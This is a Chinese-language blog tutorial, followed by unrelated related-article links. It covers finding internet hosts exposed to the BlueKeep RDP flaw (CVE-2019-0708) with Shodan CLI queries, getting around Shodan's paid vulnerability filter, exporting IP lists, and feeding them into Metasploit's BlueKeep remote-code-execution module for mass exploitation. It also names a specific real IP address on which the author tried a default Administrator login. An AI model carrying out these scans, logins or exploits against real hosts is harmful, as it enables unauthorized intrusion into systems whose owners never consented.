当前位置: 首页 > news >正文

shodan2:绕过shodan高级会员限制+metasploit批量验证漏洞

shodan2

shodan+metasploit批量验证漏洞

shodan的这个指令语法是特别多的,那么我不可能说一个个全部讲完,因为有的参数可能你一辈子都用不上,主要就是把一些红队最常用的参数给你讲完,今天我们看看怎么去查一个cve-2019-0708的一个漏洞

shodan search --limit 10 --fields ip_str,port '"/x03/x00/x00/x0b/x06/xd0/x00/x00/x124/x00"'
十六进制字符串(类似于指纹的方式去找)

绕过shodan高级会员限制

只有高级账号才能用vuln参数,但是如果不能使用vuln参数,也可以通过发散思维来到达同样的结果,比如上面通过指纹,在比如我们指定3389端口,然后使用has_vuln:True参数确定必须有漏洞,这样大概率有cve-2019-0708的一个漏洞,当然了再加上个关键字"port:3389 Remote Desktop Protocol os:windows"就更加准确了

shodan search --limit 10 --fields ip_str,port "port:3389 Remote Desktop Protocol os:windows" has_vuln:True

![[Pasted image 20241027022845.png]]
如果可以使用vuln参数,可以直接使用

shodan download --limit 100 --fields ip_str vuln:"CVE-2019-0708" country:jp

metasploit批量验证漏洞

  • 有漏洞不代表能利用,用windows远程连接看看主机是否存活110.35.235.228远程链接出现,测试弱口令Administrator&Administrator,无法连接不过没事。
  • 我们可以使用metasploit去进行批量的漏洞利用
search 0708
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
show options
set rhosts file:拖入IP地址文件
checkshow targets(查看帮助文档)

![[Pasted image 20241027012246.png]]
攻击不成功有几个点给大家说一下首先show options看请我们的这个pay load,ip端口要填对,在一个就是show targets它支持windows7,sever这种,你得把targets设置正确,然后我就不演示了。怕有人干坏事好吧,这样找漏洞是不是特别的方便呢。

shodan语法:parse、downIoad

今天接着讲两个参数,一个是parse一个是downIoad(下载)
我们首先看看这个downIoad

download(下载)

查看帮助文档

 shodan download -hUsage: shodan download [OPTIONS] <filename> <search query>Download search results and save them in a compressed JSON file.Options:--fields TEXT    Specify the list of properties to download instead ofgrabbing the full banner--limit INTEGER  The number of results you want to download. -1 to downloadall the data possible.-h, --help       Show this message and exit.

使用实例

shodan download [OPTIONS] <filename> <search query>
shodan download <文件名> <搜索查询> [选项]shodan download 0708 --limit 10 --fields ip_str,port '"/x03/x00/x00/x0b/x06/xd0/x00/x00/x124/x00"'
0708是文件名有钱的直接使用vuln参数就行
shodan download cve-2019-0708 --limit 10 vuln:"CVE-2019-0708"

![[Pasted image 20241026230154.png]]

parse(解压)

shodan parse -h(查看帮助文档)Usage: shodan parse [OPTIONS] <filenames>Extract information out of compressed JSON files.Options:--color / --no-color--fields TEXT         List of properties to output.-f, --filters TEXT    Filter the results for specific values using key:valuepairs.-O, --filename TEXT   Save the filtered results in the given file (append iffile exists).--separator TEXT      The separator between the properties of the searchresults.-h, --help            Show this message and exit.

使用

shodan parse --fields ip_str <文件名>shodan parse --fields ip_str '/home/kali/桌面/cve-2019-0708.json.gz' >0708>0708表示将解压内容输入到0708文件里面

这就是一个批量刷漏洞的姿势好吧,希望大家遵纪守法,
为什么不用,shodan search vuln:cve-2019-0708这种可能是说要更高级别的账号好吧我们换种方式照样绕过它去批量刷洞

参考

【shodan(2)】https://www.bilibili.com/video/BV1ePyDYEE9b?vd_source=6a7d9c477e11fffc54155ce1c6cf0c1c


http://www.mrgr.cn/news/59318.html

相关文章:

  • iOS -- 代码优化
  • 如何加速你的 JavaScript【Part3】:优化递归算法
  • 如何修改IP地址:全面指南
  • 利用lammps模拟不同预制裂纹对单晶铝的力学性能的影响
  • 小程序无法获取头像昵称以及手机号码的深度剖析与解决方案
  • 享元设计模式在Java坦克游戏中的应用
  • Python浪漫之画一个圆月亮
  • 6.Linux按键驱动-阻塞与非阻塞
  • 安全知识见闻-脚本语言对与安全的重要性
  • 使用FRP搭建内网穿透服务(新版toml配置文件,搭配反向代理方便内网网站访问)【使用frp搭建内网穿透】
  • 索引的使用和优化
  • 基于SSM“毛毛宠物店”宠物信息交流平台的设计与实现
  • Linux中C/C++程序编译过程与动静态链接库概述
  • LeetCode438.找到字符串中所有字母异位词
  • Macos系统使用wine安装window的exe软件
  • Redis 线程控制 总结
  • 图片懒加载
  • lodash 库作用
  • python的装饰器
  • 好/坏代码实例解读:图文并茂说明
  • 在MySQL中存储IP地址的最佳实践
  • C#判断带数字的字符串数组连续性的两种方式
  • 【JavaSE】认识String类,了解,进阶到熟练掌握
  • 使用 Resilience4j 实现重试
  • PHP模拟多继承的方式:traits
  • 数据结构 - 散列表,初探